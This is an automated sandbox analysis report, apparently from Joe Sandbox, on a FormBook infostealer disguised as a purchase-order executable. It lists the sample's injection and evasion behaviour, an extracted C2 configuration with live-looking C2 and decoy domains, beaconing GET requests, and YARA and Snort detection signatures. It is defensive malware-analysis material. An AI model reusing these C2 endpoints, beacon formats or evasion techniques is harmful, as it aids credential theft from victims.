Loading ...

Play interactive tourEdit tour

Analysis Report PO 367628usa.exe

Overview

General Information

Sample Name:PO 367628usa.exe
Analysis ID:412247
MD5:42cf4c3943d5a839412a16a4d8b8d65d
SHA1:f26230352a412de0ca8b1ffc6fc07838b878a68a
SHA256:1ceec55d4acbb8db907798df6b1be5832f32d2d4e459c5bd08d0252a0763b30c
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
PE file has nameless sections
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PO 367628usa.exe (PID: 6596 cmdline: 'C:\Users\user\Desktop\PO 367628usa.exe' MD5: 42CF4C3943D5A839412A16A4D8B8D65D)
    • PO 367628usa.exe (PID: 6692 cmdline: C:\Users\user\Desktop\PO 367628usa.exe MD5: 42CF4C3943D5A839412A16A4D8B8D65D)
    • PO 367628usa.exe (PID: 6700 cmdline: C:\Users\user\Desktop\PO 367628usa.exe MD5: 42CF4C3943D5A839412A16A4D8B8D65D)
    • PO 367628usa.exe (PID: 6716 cmdline: C:\Users\user\Desktop\PO 367628usa.exe MD5: 42CF4C3943D5A839412A16A4D8B8D65D)
    • PO 367628usa.exe (PID: 6724 cmdline: C:\Users\user\Desktop\PO 367628usa.exe MD5: 42CF4C3943D5A839412A16A4D8B8D65D)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 7104 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 5544 cmdline: /c del 'C:\Users\user\Desktop\PO 367628usa.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.uuoouu-90.store/meub/"], "decoy": ["ebookcu.com", "sherwooddaydesigns.com", "healthcarebb.com", "pixelflydesigns.com", "youtegou.net", "audiokeychin.com", "rioranchoeventscenter.com", "nickofolas.com", "comicstattoosnguns.com", "ally.tech", "paperplaneexplorer.com", "janetkk.com", "sun1981.com", "pocopage.com", "shortagegoal.com", "tbluelinux.com", "servantsheartvalet.com", "jkhushal.com", "91huangyu.com", "portlandconservatory.net", "crazyasskaren.com", "gr8.photos", "silviabiasiolipatisserie.com", "goeseo.com", "shellyluther.com", "salvemosalsuroeste.com", "technologies.email", "xn--80aasvjfhla.xn--p1acf", "dmowang.com", "mylifeusaaatworkportal.com", "electronicszap.com", "thefrankversion.com", "patricksparber.com", "m-kenterprises.com", "goodcreditcardshome.info", "shegotit.club", "nutinbutter.com", "bridgestreetresources.com", "tjanyancha.com", "qqstoneandcabinet.com", "topstitch.info", "shadyshainarae.com", "meucamarimoficial.com", "gatedless.net", "aal888.com", "tstcongo.com", "luckyladybugnailswithlisa.com", "usapersonalshopper.com", "893645tuerigjo.com", "pbjusering.com", "katbumydbnjk.mobi", "bostonm.info", "amesshop.com", "k-9homefinders.com", "philbaileyrealestate.com", "ahxinnuojie.com", "ardougne.com", "pasteleriaruth.com", "vauvakuumettapodcast.com", "aryamakoran.com", "digitalspacepod.com", "clarkstrain.com", "plantbasedranch.com", "therapylightclub.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.589496878.0000000002E40000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.589496878.0000000002E40000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.PO 367628usa.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.PO 367628usa.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.PO 367628usa.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166b9:$sqlite3step: 68 34 1C 7B E1
        • 0x167cc:$sqlite3step: 68 34 1C 7B E1
        • 0x166e8:$sqlite3text: 68 38 2A 90 C5
        • 0x1680d:$sqlite3text: 68 38 2A 90 C5
        • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
        5.2.PO 367628usa.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.PO 367628usa.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.uuoouu-90.store/meub/"], "decoy": ["ebookcu.com", "sherwooddaydesigns.com", "healthcarebb.com", "pixelflydesigns.com", "youtegou.net", "audiokeychin.com", "rioranchoeventscenter.com", "nickofolas.com", "comicstattoosnguns.com", "ally.tech", "paperplaneexplorer.com", "janetkk.com", "sun1981.com", "pocopage.com", "shortagegoal.com", "tbluelinux.com", "servantsheartvalet.com", "jkhushal.com", "91huangyu.com", "portlandconservatory.net", "crazyasskaren.com", "gr8.photos", "silviabiasiolipatisserie.com", "goeseo.com", "shellyluther.com", "salvemosalsuroeste.com", "technologies.email", "xn--80aasvjfhla.xn--p1acf", "dmowang.com", "mylifeusaaatworkportal.com", "electronicszap.com", "thefrankversion.com", "patricksparber.com", "m-kenterprises.com", "goodcreditcardshome.info", "shegotit.club", "nutinbutter.com", "bridgestreetresources.com", "tjanyancha.com", "qqstoneandcabinet.com", "topstitch.info", "shadyshainarae.com", "meucamarimoficial.com", "gatedless.net", "aal888.com", "tstcongo.com", "luckyladybugnailswithlisa.com", "usapersonalshopper.com", "893645tuerigjo.com", "pbjusering.com", "katbumydbnjk.mobi", "bostonm.info", "amesshop.com", "k-9homefinders.com", "philbaileyrealestate.com", "ahxinnuojie.com", "ardougne.com", "pasteleriaruth.com", "vauvakuumettapodcast.com", "aryamakoran.com", "digitalspacepod.com", "clarkstrain.com", "plantbasedranch.com", "therapylightclub.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: PO 367628usa.exeVirustotal: Detection: 35%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.589496878.0000000002E40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.589661592.0000000002E70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.347022763.00000000039F5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.389944333.0000000001440000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.390287791.0000000001860000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.PO 367628usa.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.PO 367628usa.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: PO 367628usa.exeJoe Sandbox ML: detected
          Source: 5.2.PO 367628usa.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: PO 367628usa.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: PO 367628usa.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.372619692.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO 367628usa.exe, 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, raserver.exe, 00000009.00000002.590539014.0000000004BB0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO 367628usa.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: PO 367628usa.exe, 00000005.00000002.391160036.00000000034E0000.00000040.00000001.sdmp
          Source: Binary string: RAServer.pdbGCTL source: PO 367628usa.exe, 00000005.00000002.391160036.00000000034E0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.372619692.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop esi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49744 -> 209.182.202.96:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49744 -> 209.182.202.96:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49744 -> 209.182.202.96:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.uuoouu-90.store/meub/
          Source: global trafficHTTP traffic detected: GET /meub/?5jYHTPD=WGLirrwFUtYpDXzpLjvBuZZEIXcS0L/7kvp4uO4ypDpemvycQ/ZH3e36klWLP588DVSUgz18wg==&W2MTZ=5jyDHn6x2rY HTTP/1.1Host: www.servantsheartvalet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?5jYHTPD=AHOwzMgiYatzzgqEm8fFrRw5FyeBXJPWAn72SIj91D3zxHtkj2kvoxgZPNykIH4K/OrW/jgvcw==&W2MTZ=5jyDHn6x2rY HTTP/1.1Host: www.m-kenterprises.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?5jYHTPD=wcKMzz9mAcCi2aLb0t1qtV86GlMNvZH+VyhKA1jT/I4bq+nb0/na/dj3wGs+8qrOUrJA87J5aQ==&W2MTZ=5jyDHn6x2rY HTTP/1.1Host: www.bridgestreetresources.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?5jYHTPD=IF6wwdQ2GC/v5+zeo737nU5N5nLUvdsVBqkfZ3TmK32/J3TLHA8Ym95CSjw9+1sG86DK55WYOQ==&W2MTZ=5jyDHn6x2rY HTTP/1.1Host: www.shadyshainarae.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 66.235.200.147 66.235.200.147
          Source: Joe Sandbox ViewASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
          Source: Joe Sandbox ViewASN Name: IMH-WESTUS IMH-WESTUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /meub/?5jYHTPD=WGLirrwFUtYpDXzpLjvBuZZEIXcS0L/7kvp4uO4ypDpemvycQ/ZH3e36klWLP588DVSUgz18wg==&W2MTZ=5jyDHn6x2rY HTTP/1.1Host: www.servantsheartvalet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?5jYHTPD=AHOwzMgiYatzzgqEm8fFrRw5FyeBXJPWAn72SIj91D3zxHtkj2kvoxgZPNykIH4K/OrW/jgvcw==&W2MTZ=5jyDHn6x2rY HTTP/1.1Host: www.m-kenterprises.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?5jYHTPD=wcKMzz9mAcCi2aLb0t1qtV86GlMNvZH+VyhKA1jT/I4bq+nb0/na/dj3wGs+8qrOUrJA87J5aQ==&W2MTZ=5jyDHn6x2rY HTTP/1.1Host: www.bridgestreetresources.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?5jYHTPD=IF6wwdQ2GC/v5+zeo737nU5N5nLUvdsVBqkfZ3TmK32/J3TLHA8Ym95CSjw9+1sG86DK55WYOQ==&W2MTZ=5jyDHn6x2rY HTTP/1.1Host: www.shadyshainarae.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.servantsheartvalet.com
          Source: PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: PO 367628usa.exe, 00000000.00000002.346748080.0000000002EB0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmpString found in binary or memory: http://servermanager.miixit.org/1
          Source: PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmpString found in binary or memory: http://servermanager.miixit.org/downloads/
          Source: PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmpString found in binary or memory: http://servermanager.miixit.org/hits/hit_index.php?k=
          Source: PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmpString found in binary or memory: http://servermanager.miixit.org/index_ru.html
          Source: PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmpString found in binary or memory: http://servermanager.miixit.org/index_ru.htmlc
          Source: PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmpString found in binary or memory: http://servermanager.miixit.org/report/reporter_index.php?name=
          Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000006.00000002.589360759.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: raserver.exe, 00000009.00000002.589924154.0000000002F3C000.00000004.00000020.sdmpString found in binary or memory: http://www.patricksparber.com/
          Source: raserver.exe, 00000009.00000002.589924154.0000000002F3C000.00000004.00000020.sdmpString found in binary or memory: http://www.patricksparber.com/K
          Source: raserver.exe, 00000009.00000002.589940302.0000000002F43000.00000004.00000020.sdmpString found in binary or memory: http://www.patricksparber.com/meub/?5jYHTPD=q/3go0TMrjOOicJ8yyeZoSSUK4YYViZWgar0VOI0LAyS1IHPJrhhqQPM
          Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmpString found in binary or memory: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=CJU3DBQXBUQPC
          Source: PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmpString found in binary or memory: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=CJU3DBQXBUQPC5http://servermana
          Source: PO 367628usa.exe, 00000000.00000002.345192885.0000000000B2B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.589496878.0000000002E40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.589661592.0000000002E70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.347022763.00000000039F5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.389944333.0000000001440000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.390287791.0000000001860000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.PO 367628usa.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.PO 367628usa.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.589496878.0000000002E40000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.589496878.0000000002E40000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.589661592.0000000002E70000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.589661592.0000000002E70000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.347022763.00000000039F5000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.347022763.00000000039F5000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.389944333.0000000001440000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.389944333.0000000001440000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.390287791.0000000001860000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.390287791.0000000001860000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.PO 367628usa.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.PO 367628usa.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.PO 367628usa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
